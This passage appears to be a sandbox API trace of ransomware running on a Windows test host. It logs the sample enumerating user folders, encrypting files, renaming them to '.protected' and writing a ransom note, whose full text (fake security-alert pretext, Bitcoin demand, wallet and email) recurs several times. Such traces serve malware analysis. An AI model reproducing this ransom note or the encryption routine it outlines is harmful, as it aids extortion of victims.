lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x104, lpOverlapped=0x0) returned 1 [0085.216] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.216] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x104, lpOverlapped=0x0) returned 1 [0085.216] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.216] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.216] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.216] CloseHandle (hObject=0x150) returned 1 [0085.217] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.protected") returned 144 [0085.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat.protected" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat.protected")) returned 1 [0085.218] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.218] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.218] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\RESTORE_FILES.txt") returned 93 [0085.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.225] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.225] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.226] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.226] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.226] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.226] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.226] CloseHandle (hObject=0x14c) returned 1 [0085.228] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.228] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.228] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RESTORE_FILES.txt") returned 83 [0085.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.230] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.230] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.231] lstrlenA (lpString="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") returned 684 [0085.231] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.231] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.231] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0085.231] CloseHandle (hObject=0xd8) returned 1 [0085.231] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="Windows") returned -1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="Program Files") returned 1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="Program Files (x86)") returned 1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="$Recycle.bin") returned 1 [0085.231] lstrcmpiW (lpString1="Publisher", lpString2="System Volume Information") returned -1 [0085.231] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher") returned 67 [0085.231] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0085.231] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0085.231] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*") returned 69 [0085.232] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.247] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.247] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.247] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.247] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.247] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.247] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\.") returned 69 [0085.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.247] FindNextFileW 
(in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.247] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.247] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.247] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.247] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.247] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.247] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\..") returned 70 [0085.247] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.247] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.247] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.247] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\RESTORE_FILES.txt") returned 85 [0085.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Publisher\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\publisher\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.248] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.248] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.249] lstrlenA (lpString="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") returned 684 [0085.249] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.249] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.249] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.249] CloseHandle (hObject=0xd8) returned 1 [0085.249] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="Windows") returned -1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="Program Files") returned 1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="Program Files (x86)") returned 1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="$Recycle.bin") returned 1 [0085.249] lstrcmpiW (lpString1="TaskSchedulerConfig", lpString2="System Volume Information") returned 1 [0085.249] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig") returned 77 [0085.249] lstrcmpW (lpString1="TaskSchedulerConfig", lpString2=".") returned 1 [0085.250] lstrcmpW (lpString1="TaskSchedulerConfig", lpString2="..") returned 1 [0085.250] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*") returned 79 [0085.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.250] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.250] lstrcmpiW (lpString1=".", lpString2="Program Files") returned 
-1 [0085.250] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.250] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.250] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.250] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\.") returned 79 [0085.250] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.250] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.250] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.250] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.250] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.250] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.251] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.251] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\..") returned 80 [0085.251] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.251] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.251] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.251] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.251] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\RESTORE_FILES.txt") returned 95 [0085.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\taskschedulerconfig\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.252] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.252] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.252] lstrlenA 
(lpString="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") returned 684 [0085.253] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.253] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.253] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.253] CloseHandle (hObject=0xd8) returned 1 [0085.253] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="Windows") returned -1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="Program Files") returned 1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="Program Files (x86)") returned 1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="$Recycle.bin") returned 1 [0085.253] lstrcmpiW (lpString1="Visio", lpString2="System Volume Information") returned 1 [0085.253] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio") returned 63 [0085.253] lstrcmpW (lpString1="Visio", lpString2=".") returned 1 [0085.253] lstrcmpW (lpString1="Visio", lpString2="..") returned 1 [0085.253] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*") returned 65 [0085.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\*", lpFindFileData=0x295ea40 | out: 
lpFindFileData=0x295ea40) returned 0x47ba50 [0085.254] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.254] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.254] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.254] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.254] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.254] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\.") returned 65 [0085.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.254] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.254] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.254] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.254] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.254] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.254] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.254] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\..") returned 66 [0085.254] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.254] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.254] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="Windows") returned -1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="Program Files") returned -1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="Program Files (x86)") returned -1 [0085.254] lstrcmpiW (lpString1="content14.dat", lpString2="$Recycle.bin") returned 1 [0085.254] lstrcmpiW 
(lpString1="content14.dat", lpString2="System Volume Information") returned -1 [0085.254] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0085.254] StrStrIW (lpFirst="content14.dat", lpSrch=".protected") returned 0x0 [0085.254] lstrcmpW (lpString1="content14.dat", lpString2="RESTORE_FILES.txt") returned -1 [0085.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\content14.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0085.255] StrStrW (lpFirst="content14.dat", lpSrch=".txt") returned 0x0 [0085.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0085.255] StrStrW (lpFirst="content14.dat", lpSrch=".rar") returned 0x0 [0085.255] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\content14.dat") returned 77 [0085.255] StrStrW (lpFirst="content14.dat", lpSrch=".zip") returned 0x0 [0085.255] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 
